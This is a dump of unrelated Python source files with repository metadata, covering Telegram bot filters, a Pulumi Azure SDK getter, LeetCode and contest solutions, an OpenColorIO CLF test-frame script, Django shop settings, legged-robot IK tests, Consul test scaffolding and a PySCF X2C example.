socket.stop()
if __name__ == '__main__':
try:
main()
    # This nasty little except on all exceptions makes sure that exceptions
    # are logged
    except Exception as e:
        LOGGER.exception(e)
        raise
raw_input("Press enter to exit")
|
[
"k.nielsen81@gmail.com"
] |
k.nielsen81@gmail.com
|
929c36a16c6510056a32e3a51fdc66da8a0b0bae
|
47deebe6fefedb01fdce5d4e82f58bb08f8e1e92
|
/python core/Lesson_35/own_filter.py
|
88b22438ef99e205d34e4d28385a56a6dc930970
|
[] |
no_license
|
developeryuldashev/python-core
|
5bb162603bdb5782acf05e3fb25ca5dd6347067a
|
08fca77c9cfde69d93a7875b3fb65b98f3dabd78
|
refs/heads/main
| 2023-08-21T03:33:12.160133
| 2021-10-19T04:56:53
| 2021-10-19T04:56:53
| 393,383,696
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 464
|
py
|
from telegram.ext import MessageFilter
class HandlePython(MessageFilter):
    name = 'Filters.python'
    def filter(self, message):
        # Match against the message text, not the Message object itself
        return 'python' in message.text
python = HandlePython()
class FilterAwesome(MessageFilter):
    def filter(self, message):
        return 'Dilshod' in message.text
filter_awesome = FilterAwesome()
class FilterRaxmat(MessageFilter):
    def filter(self, message):  # the hook must be named `filter`, not `raxmat`
        return 'raxmat' in message.text
filter_raxmat = FilterRaxmat()
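# A minimal usage sketch, assuming a python-telegram-bot v13-style API; the
# bot token and the on_python callback below are hypothetical placeholders:
#     from telegram.ext import Updater, MessageHandler
#     def on_python(update, context):
#         update.message.reply_text('You mentioned python!')
#     updater = Updater('BOT-TOKEN')
#     updater.dispatcher.add_handler(MessageHandler(python, on_python))
#     updater.start_polling()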
|
[
"81365808+developeryuldashev@users.noreply.github.com"
] |
81365808+developeryuldashev@users.noreply.github.com
|
ef244246907dc513e7d6480d145bca83363884b1
|
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
|
/sdk/python/pulumi_azure_native/sql/v20210201preview/get_sync_agent.py
|
c041588b469bf583ea5fe3162b8e9d913380dff9
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
bpkgoud/pulumi-azure-native
|
0817502630062efbc35134410c4a784b61a4736d
|
a3215fe1b87fba69294f248017b1591767c2b96c
|
refs/heads/master
| 2023-08-29T22:39:49.984212
| 2021-11-15T12:43:41
| 2021-11-15T12:43:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,746
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'GetSyncAgentResult',
'AwaitableGetSyncAgentResult',
'get_sync_agent',
'get_sync_agent_output',
]
@pulumi.output_type
class GetSyncAgentResult:
"""
An Azure SQL Database sync agent.
"""
def __init__(__self__, expiry_time=None, id=None, is_up_to_date=None, last_alive_time=None, name=None, state=None, sync_database_id=None, type=None, version=None):
if expiry_time and not isinstance(expiry_time, str):
raise TypeError("Expected argument 'expiry_time' to be a str")
pulumi.set(__self__, "expiry_time", expiry_time)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if is_up_to_date and not isinstance(is_up_to_date, bool):
raise TypeError("Expected argument 'is_up_to_date' to be a bool")
pulumi.set(__self__, "is_up_to_date", is_up_to_date)
if last_alive_time and not isinstance(last_alive_time, str):
raise TypeError("Expected argument 'last_alive_time' to be a str")
pulumi.set(__self__, "last_alive_time", last_alive_time)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if sync_database_id and not isinstance(sync_database_id, str):
raise TypeError("Expected argument 'sync_database_id' to be a str")
pulumi.set(__self__, "sync_database_id", sync_database_id)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if version and not isinstance(version, str):
raise TypeError("Expected argument 'version' to be a str")
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="expiryTime")
def expiry_time(self) -> str:
"""
Expiration time of the sync agent version.
"""
return pulumi.get(self, "expiry_time")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="isUpToDate")
def is_up_to_date(self) -> bool:
"""
If the sync agent version is up to date.
"""
return pulumi.get(self, "is_up_to_date")
@property
@pulumi.getter(name="lastAliveTime")
def last_alive_time(self) -> str:
"""
Last alive time of the sync agent.
"""
return pulumi.get(self, "last_alive_time")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def state(self) -> str:
"""
State of the sync agent.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="syncDatabaseId")
def sync_database_id(self) -> Optional[str]:
"""
ARM resource id of the sync database in the sync agent.
"""
return pulumi.get(self, "sync_database_id")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def version(self) -> str:
"""
Version of the sync agent.
"""
return pulumi.get(self, "version")
class AwaitableGetSyncAgentResult(GetSyncAgentResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSyncAgentResult(
expiry_time=self.expiry_time,
id=self.id,
is_up_to_date=self.is_up_to_date,
last_alive_time=self.last_alive_time,
name=self.name,
state=self.state,
sync_database_id=self.sync_database_id,
type=self.type,
version=self.version)
def get_sync_agent(resource_group_name: Optional[str] = None,
server_name: Optional[str] = None,
sync_agent_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSyncAgentResult:
"""
An Azure SQL Database sync agent.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server on which the sync agent is hosted.
:param str sync_agent_name: The name of the sync agent.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['serverName'] = server_name
__args__['syncAgentName'] = sync_agent_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:sql/v20210201preview:getSyncAgent', __args__, opts=opts, typ=GetSyncAgentResult).value
return AwaitableGetSyncAgentResult(
expiry_time=__ret__.expiry_time,
id=__ret__.id,
is_up_to_date=__ret__.is_up_to_date,
last_alive_time=__ret__.last_alive_time,
name=__ret__.name,
state=__ret__.state,
sync_database_id=__ret__.sync_database_id,
type=__ret__.type,
version=__ret__.version)
@_utilities.lift_output_func(get_sync_agent)
def get_sync_agent_output(resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
sync_agent_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSyncAgentResult]:
"""
An Azure SQL Database sync agent.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server on which the sync agent is hosted.
:param str sync_agent_name: The name of the sync agent.
"""
...
|
[
"noreply@github.com"
] |
bpkgoud.noreply@github.com
|
72536ffc2001ee0a6739dd5cbc5f200e014063a0
|
5ed2d0e107e4cdcd8129f418fdc40f1f50267514
|
/Medium/WordBreak/test.py
|
b3be093b1de892e18dfc3f8c3a1b7047621616fd
|
[] |
no_license
|
tliu57/Leetcode
|
6cdc3caa460a75c804870f6615653f335fc97de1
|
c480697d174d33219b513a0b670bc82b17c91ce1
|
refs/heads/master
| 2020-05-21T03:14:07.399407
| 2018-07-08T18:50:01
| 2018-07-08T18:50:01
| 31,505,035
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
class Solution(object):
    def wordBreak(self, s, wordDict):
        # dp[i] is truthy iff s[:i] can be segmented into dictionary words
        dp = [0 for i in range(len(s)+1)]
        dp[0] = 1
        for i in range(1, len(s)+1):
            for j in range(0, i):
                dp[i] = dp[j] and (s[j:i] in wordDict)
                if dp[i]:
                    break
        return dp[len(s)]
sol = Solution()
print(sol.wordBreak("leetcode", ["leet", "code"]))
|
[
"tliu57@asu.edu"
] |
tliu57@asu.edu
|
43db92d549c4350589805bb14e755300ffbd27b8
|
29345337bf86edc938f3b5652702d551bfc3f11a
|
/python/src/main/python/pyalink/alink/tests/examples/operator/batch/test_fpgrowth.py
|
320e2b8f49396dfb6cd99a9decade08889f1534a
|
[
"Apache-2.0"
] |
permissive
|
vacaly/Alink
|
32b71ac4572ae3509d343e3d1ff31a4da2321b6d
|
edb543ee05260a1dd314b11384d918fa1622d9c1
|
refs/heads/master
| 2023-07-21T03:29:07.612507
| 2023-07-12T12:41:31
| 2023-07-12T12:41:31
| 283,079,072
| 0
| 0
|
Apache-2.0
| 2020-07-28T02:46:14
| 2020-07-28T02:46:13
| null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
import unittest
import numpy as np
import pandas as pd
from pyalink.alink import *
class TestFpGrowth(unittest.TestCase):
def test_fpgrowth(self):
data = np.array([
["A,B,C,D"],
["B,C,E"],
["A,B,C,E"],
["B,D,E"],
["A,B,C,D"],
])
df_data = pd.DataFrame({
"items": data[:, 0],
})
data = dataframeToOperator(df_data, schemaStr='items string', op_type="batch")
fpGrowth = FpGrowthBatchOp() \
.setItemsCol("items") \
.setMinSupportPercent(0.4) \
.setMinConfidence(0.6)
fpGrowth.linkFrom(data)
fpGrowth.print()
fpGrowth.getSideOutput(0).print()
|
[
"shaomeng.wang.w@gmail.com"
] |
shaomeng.wang.w@gmail.com
|
5bdcfff19eab4786af18070910c55548fcd426dc
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02909/s681576776.py
|
241c49b560159f84603785465ffd994ee3525f21
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 253
|
py
|
import sys
readline = sys.stdin.readline
MOD = 10 ** 9 + 7
INF = float('INF')
sys.setrecursionlimit(10 ** 5)
def main():
S = input()
p = ["Sunny", "Cloudy", "Rainy"]
print(p[(p.index(S) + 1) % 3])
if __name__ == '__main__':
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
c96f6aeeabc58d40d4d44ece2ada2adcf6232c01
|
66fc3d58e94e8340a0d825501776a1dea37c0198
|
/share/clf/process_clf_test_frames.py
|
aa63846e8c287609b0713bda9dd25814f6949612
|
[
"CC-BY-4.0",
"BSD-3-Clause"
] |
permissive
|
AcademySoftwareFoundation/OpenColorIO
|
dad370b54be147ae94f18ed6414d53bd76e9ef74
|
96f528fdfb7f9fb24388e33f6a968d29a3909cf8
|
refs/heads/main
| 2023-08-29T08:51:45.625957
| 2023-08-29T01:42:37
| 2023-08-29T01:42:37
| 775,131
| 843
| 236
|
BSD-3-Clause
| 2023-09-14T02:56:01
| 2010-07-14T18:22:06
|
C++
|
UTF-8
|
Python
| false
| false
| 3,582
|
py
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
# Use OpenColorIO to apply the CLF files from the CLF test kit to the CLF target image
# and produce a directory of processed OpenEXR images at the specified location.
# Run the script with "-h" for usage information.
# This script is python 2.7 and python 3 compatible.
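# For example (the destination directory below is arbitrary):
#     python process_clf_test_frames.py /tmp/clf_out --gpu --opt lossless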
import os
import argparse
def process_frames( options ):
dst_path = options.dst_dir
use_gpu = options.gpu
opt_level = options.opt
# Check the arguments are as expected.
if not os.path.exists( dst_path ):
os.mkdir( dst_path )
if not os.path.isdir( dst_path ):
raise ValueError( "Destination path must be a directory: " + dst_path )
# Get the path to the CLF target image, relative to the path of this script.
script_path = os.path.abspath( __file__ )
parts = script_path.split( os.sep )
ocio_base_path = os.path.join( os.sep, *parts[0:-3] )
src_image = os.path.join( ocio_base_path, 'share', 'clf', 'CLF_testimage.exr' )
# Get the path to the CLF files, relative to the path of this script.
clf_path = os.path.join( ocio_base_path, 'tests', 'data', 'files', 'clf' )
# Set the optimization level. None or lossless avoids the fast SSE log/exponent.
# (Note that the decimal value is available by simply printing the enum in Python.)
if (opt_level == 'none') or (opt_level is None):
# For default for this script, use no optimization rather than OCIO's default optimization
# in order to apply the operators exactly as they appear in the CLF file with no attempt
# to speed up the processing.
print( 'Optimization level: None' )
os.environ["OCIO_OPTIMIZATION_FLAGS"] = "0"
elif opt_level == 'lossless':
print( 'Optimization level: Lossless' )
os.environ["OCIO_OPTIMIZATION_FLAGS"] = "144457667"
elif opt_level == 'default':
print( 'Optimization level: Default' )
else:
raise ValueError( 'Unexpected --opt argument.' )
# TODO: Add an option to turn on only SSE without removing any ops.
if use_gpu:
print( 'Processing on the GPU\n' )
cmd_base = 'ocioconvert --gpu --lut %s %s %s'
else:
print( 'Processing on the CPU\n' )
cmd_base = 'ocioconvert --lut %s %s %s'
# Iterate over each legal CLF file in the suite.
for f in os.listdir( clf_path ):
fname, ext = os.path.splitext( f )
if ext == '.clf':
# Build the full path to the file.
p = os.path.join( clf_path, f )
# Build the name of the destination image.
dst_image = os.path.join( dst_path, fname + '.exr' )
# Build the command.
cmd = cmd_base % (p, src_image, dst_image)
print('================='); print( cmd )
# Process the image.
os.system( cmd )
if __name__ == '__main__':
    import sys
parser = argparse.ArgumentParser(description='Process CLF test images using OCIO.')
parser.add_argument('dst_dir',
help='Path to a directory where the result images will be stored.')
parser.add_argument('--gpu', action='store_true',
help='Process using the GPU rather than the CPU.')
parser.add_argument('--opt', choices=['none','lossless','default'],
help='Specify the OCIO optimization level. If not specified, "none" will be used.')
options = parser.parse_args(sys.argv[1:])
process_frames(options)
|
[
"noreply@github.com"
] |
AcademySoftwareFoundation.noreply@github.com
|
8a5f6c810c7991adc091d743259b6ed996eb5cd7
|
e49d49b54f2d5cd25674050419f991477363c46b
|
/myshop/myshop/settings.py
|
0a395ec79e6d309382afe3967821b0a84079f336
|
[] |
no_license
|
akashgiricse/online-shop
|
0d87323e016f5c8a48020abd1d973987abd86035
|
94438876b8b2dd530ec05cb3c8df1b6a049fa514
|
refs/heads/master
| 2020-04-10T12:00:02.644277
| 2018-12-24T17:27:06
| 2018-12-24T17:27:06
| 161,008,658
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,310
|
py
|
"""
Django settings for myshop project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
from decouple import config, Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=True, cast=bool)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = [
'shop.apps.ShopConfig',
'cart.apps.CartConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myshop.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'myshop.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
CART_SESSION_ID = 'cart'
|
[
"akashgiricse@gmail.com"
] |
akashgiricse@gmail.com
|
f80bb33e5349f60b61a5f79be62824f534c30071
|
52a0e6c0be7eebfde22c886ff7b8e605a27428ce
|
/src/looped/__init__.py
|
22239d5ad5b39afa66288653d476cd7ead07ba1e
|
[] |
no_license
|
vied12/LoopED
|
42d5663c36d7b0026196faa152a75576993fb30d
|
4126a2b655f68c20bd1029a4d69597dd877c18cb
|
refs/heads/master
| 2022-07-01T04:42:02.150799
| 2017-07-26T12:55:39
| 2017-07-26T12:55:39
| 84,230,616
| 1
| 1
| null | 2022-06-17T21:14:14
| 2017-03-07T18:05:26
|
CSS
|
UTF-8
|
Python
| false
| false
| 204
|
py
|
from .Led import create_led
from .animations import Jump, Tuner, Intro, Metronome
from .gamepads import WebGamePad
__all__ = [
    'create_led',
    'Jump',
    'WebGamePad',
    'Tuner',
    'Intro',
    'Metronome',
]
|
[
"edou4rd@gmail.com"
] |
edou4rd@gmail.com
|
dec105911efbe7e1fcfffd57f3a39b128a4b12f8
|
4bd9d17a8697c0e87ce8b35e6189913d9f7dd1db
|
/legtool/gait/test_leg_ik.py
|
2ce98243e4217c2bdb3a010821e25e54a5c1ce3f
|
[
"Apache-2.0"
] |
permissive
|
jpieper/legtool
|
c72fe8a77871720f217634bb07602c709ba52583
|
ab3946051bd16817b61d3073ce7be8bd27af90d0
|
refs/heads/master
| 2020-05-21T11:34:15.762189
| 2014-12-01T02:15:46
| 2014-12-01T02:15:46
| 21,541,872
| 10
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,133
|
py
|
# Copyright 2014 Josh Pieper, jjp@pobox.com.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from . import leg_ik
def get_lizard_config():
config = leg_ik.Configuration()
config.coxa_length_mm = 50
config.femur_length_mm = 40
config.tibia_length_mm = 30
config.coxa_min_deg = -90
config.coxa_idle_deg = 0
config.coxa_max_deg = 90
config.femur_min_deg = -90
config.femur_idle_deg = 0
config.femur_max_deg = 90
config.tibia_min_deg = -90
config.tibia_idle_deg = 0
config.tibia_max_deg = 90
config.coxa_ident = 3
config.femur_ident = 4
config.tibia_ident = 5
return config
def test_lizard_3dof():
config = get_lizard_config()
point = leg_ik.Point3D(0, 90, -30)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg) < 0.01
assert abs(result.femur_deg) < 0.01
assert abs(result.tibia_deg) < 0.01
point = leg_ik.Point3D(0, 90, -25)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg) < 0.01
assert abs(result.femur_deg - 7.18) < 0.01
assert abs(result.tibia_deg + 6.58) < 0.01
point = leg_ik.Point3D(0, 90, -35)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg) < 0.01
assert abs(result.femur_deg + 7.18) < 0.01
assert abs(result.tibia_deg - 7.78) < 0.01
point = leg_ik.Point3D(0, 95, -30)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg) < 0.01
assert abs(result.femur_deg + 0.60) < 0.01
assert abs(result.tibia_deg - 10.20) < 0.01
# Now test some with coxa.
point = leg_ik.Point3D(20, 87.75, -30)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 12.84) < 0.01
assert abs(result.femur_deg) < 0.01
assert abs(result.tibia_deg) < 0.01
point = leg_ik.Point3D(20, 87.75, -25)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 12.84) < 0.01
assert abs(result.femur_deg - 7.18) < 0.01
assert abs(result.tibia_deg + 6.58) < 0.01
command_dict = result.command_dict()
assert sorted(command_dict.keys()) == [3, 4, 5]
assert command_dict[3] == result.coxa_deg
assert command_dict[4] == result.femur_deg
assert command_dict[5] == result.tibia_deg
# Try adding in some idle to the coxa.
config.coxa_idle_deg = 3.0
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 15.84) < 0.01
assert abs(result.femur_deg - 7.18) < 0.01
assert abs(result.tibia_deg + 6.58) < 0.01
# And some idle to femur.
config.femur_idle_deg = 4.0
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 15.84) < 0.01
assert abs(result.femur_deg - 11.18) < 0.01
assert abs(result.tibia_deg + 6.58) < 0.01
# And some idle to tibia.
config.tibia_idle_deg = 5.0
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 15.84) < 0.01
assert abs(result.femur_deg - 11.18) < 0.01
assert abs(result.tibia_deg + 1.58) < 0.01
# Now try setting the max coxa low enough that we should get None.
config.coxa_max_deg = 15.0
result = leg_ik.lizard_3dof_ik(point, config)
assert result is None
config.coxa_max_deg = 90.0
result = leg_ik.lizard_3dof_ik(point, config)
assert result is not None
# And set the tibia max deg low enough to get None.
config.femur_max_deg = 10.0
result = leg_ik.lizard_3dof_ik(point, config)
assert result is None
# We'll assume the other bounds (min, and tibia) are correct for
# now.
|
[
"jjp@pobox.com"
] |
jjp@pobox.com
|
dd539a81c74353ac014e0b9b7bf8636a6b5d7ef4
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p04020/s011481880.py
|
cd16b5ea063aa01e01e9a52b7814e2636bd9e260
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
n = int(input())
a = [int(input()) for _ in range(n)]
lsts = []
temp = []
for aa in a:
if aa == 0:
if temp:
lsts.append(temp)
temp = []
else:
temp.append(aa)
if temp: lsts.append(temp)
ans = 0
for lst in lsts:
for i, aa in enumerate(lst):
ans += aa // 2
if i != len(lst)-1:
lst[i+1] -= aa % 2
ans += aa % 2
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
78ea63e50440ee9e3830cc8df7eb1b07d9a104d5
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/want_part/know_great_company.py
|
48b6a068bf3763ad3f82345d0496999bf868095a
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
#! /usr/bin/env python
def say_thing(str_arg):
world(str_arg)
print('week')
def world(str_arg):
print(str_arg)
if __name__ == '__main__':
say_thing('life')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
83e5c5465a611338cfc230da42437fe7ef263507
|
78628a4c5e4b37167b79f3b9072b30a7772d5c44
|
/tests/base.py
|
714abff7179532719b0b362d02242c4f08e11feb
|
[
"BSD-3-Clause"
] |
permissive
|
mdelagrange/consulate
|
35f8f02b1568a3d70bbcbab9796ffe7fcfc23a0a
|
312f36245aa43da2e0624e2b53dacd52986061d3
|
refs/heads/master
| 2020-12-28T20:09:10.805411
| 2018-03-13T22:41:46
| 2018-03-13T22:41:46
| 38,765,620
| 0
| 0
|
BSD-3-Clause
| 2018-07-13T19:21:42
| 2015-07-08T16:20:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,690
|
py
|
import functools
import json
import os
import unittest
import uuid
import httmock
import consulate
from consulate import exceptions
with open('testing/consul.json', 'r') as handle:
CONSUL_CONFIG = json.load(handle)
def generate_key(func):
@functools.wraps(func)
def _decorator(self, *args, **kwargs):
key = str(uuid.uuid4())[0:8]
self.used_keys.append(key)
func(self, key)
return _decorator
@httmock.all_requests
def raise_oserror(_url_unused, _request):
raise OSError
class TestCase(unittest.TestCase):
def setUp(self):
self.consul = consulate.Consul(
host=os.environ['CONSUL_HOST'],
port=os.environ['CONSUL_PORT'],
token=CONSUL_CONFIG['acl_master_token'])
self.forbidden_consul = consulate.Consul(
host=os.environ['CONSUL_HOST'],
port=os.environ['CONSUL_PORT'],
token=str(uuid.uuid4()))
self.used_keys = list()
def tearDown(self):
for key in self.consul.kv.keys():
self.consul.kv.delete(key)
checks = self.consul.agent.checks()
for name in checks:
self.consul.agent.check.deregister(checks[name]['CheckID'])
services = self.consul.agent.services()
for name in services:
self.consul.agent.service.deregister(services[name]['ID'])
for acl in self.consul.acl.list():
if acl['ID'] == CONSUL_CONFIG['acl_master_token']:
continue
try:
uuid.UUID(acl['ID'])
self.consul.acl.destroy(acl['ID'])
except (ValueError, exceptions.ConsulateException):
pass
|
[
"gavinr@aweber.com"
] |
gavinr@aweber.com
|
5bf2243fd6a0eb7978234834a4fafd6a6e57a05f
|
9dc6f8d91dc56523b9688990d4ae413b0bcbd4e1
|
/examples/x2c/02-basis_for_x.py
|
4789dc7470317b423c53acb4b0634b9b695430ef
|
[
"Apache-2.0"
] |
permissive
|
sunqm/pyscf
|
566bc2447d8072cff442d143891c12e6414de01c
|
dd179a802f0a35e72d8522503172f16977c8d974
|
refs/heads/master
| 2023-08-15T18:09:58.195953
| 2023-03-27T21:02:03
| 2023-03-27T21:02:03
| 159,149,096
| 80
| 26
|
Apache-2.0
| 2022-02-05T00:19:24
| 2018-11-26T10:10:23
|
Python
|
UTF-8
|
Python
| false
| false
| 1,764
|
py
|
#!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
The X2c method uses the uncontracted large-component basis to construct the X
matrix. The basis for the X matrix can have a big impact on the total energy.
The X2c treatment is not variational: the total energy often increases when
the quality of the large-component basis is improved. This is because the X2c
ground state is an "excited" state in the framework of the full-relativistic
spectrum. When the X2c Hamiltonian is constructed, the negative states are
projected out, and an excited state is not bounded from below. Depending on
the quality of the basis for the large component (which dominates the positive
states) and the small component (which dominates the negative states), the X2c
energy may first decrease and then increase as the basis set is systematically
enlarged.
This example shows how to adjust the X basis so that you get consistent
contributions from the X matrix for different large-component bases. Once this
uncertainty in the X matrix is removed, you may observe monotonic energy
convergence with respect to basis size.
'''
from pyscf import gto
from pyscf import scf
# A combined basis: uncontracted ANO basis plus some steep even-tempered Gaussians
xbasis = ('unc-ano',
gto.etbs([(0, 8, 1e7, 2.5), # s-function
(1, 5, 5e4, 2.5), # p-function
(2, 2, 1e3, 2.5)])) # d-function
mol = gto.M(atom = 'Zn',
basis = 'ccpvdz-dk',
)
mf = scf.RHF(mol).x2c()
# Assigning a different basis to X matrix
mf.with_x2c.basis = xbasis
mf.run()
mol = gto.M(atom = 'Zn',
basis = 'ccpvtz-dk',
)
mf = scf.RHF(mol).x2c()
mf.with_x2c.basis = xbasis
mf.run()
mol = gto.M(atom = 'Zn',
basis = 'ccpvqz-dk',
)
mf = scf.RHF(mol).x2c()
mf.with_x2c.basis = xbasis
mf.run()
|
[
"osirpt.sun@gmail.com"
] |
osirpt.sun@gmail.com
|
3fd5ea8193c7d437c0c1beb0fe3a0b1745922583
|
4b7f32e791739a09a201708a3350836156d59287
|
/moderate/trailing-string(AC).py
|
697e86dcd2d80270fb7e53b31fe98c768ba7fbaa
|
[] |
no_license
|
zhuli19901106/codeeval
|
6170849a4acbc442b957d80c410df2bcf1b09efb
|
301dcaf0098eafb776145bfa347d9eb2ee22d4e2
|
refs/heads/master
| 2020-06-04T20:50:25.391877
| 2015-05-18T23:13:13
| 2015-05-18T23:13:23
| 34,080,841
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
import re
if __name__ == '__main__':
while True:
try:
s = raw_input()
except EOFError:
break
a, b = re.split(',', s)
if len(b) > len(a):
print(0)
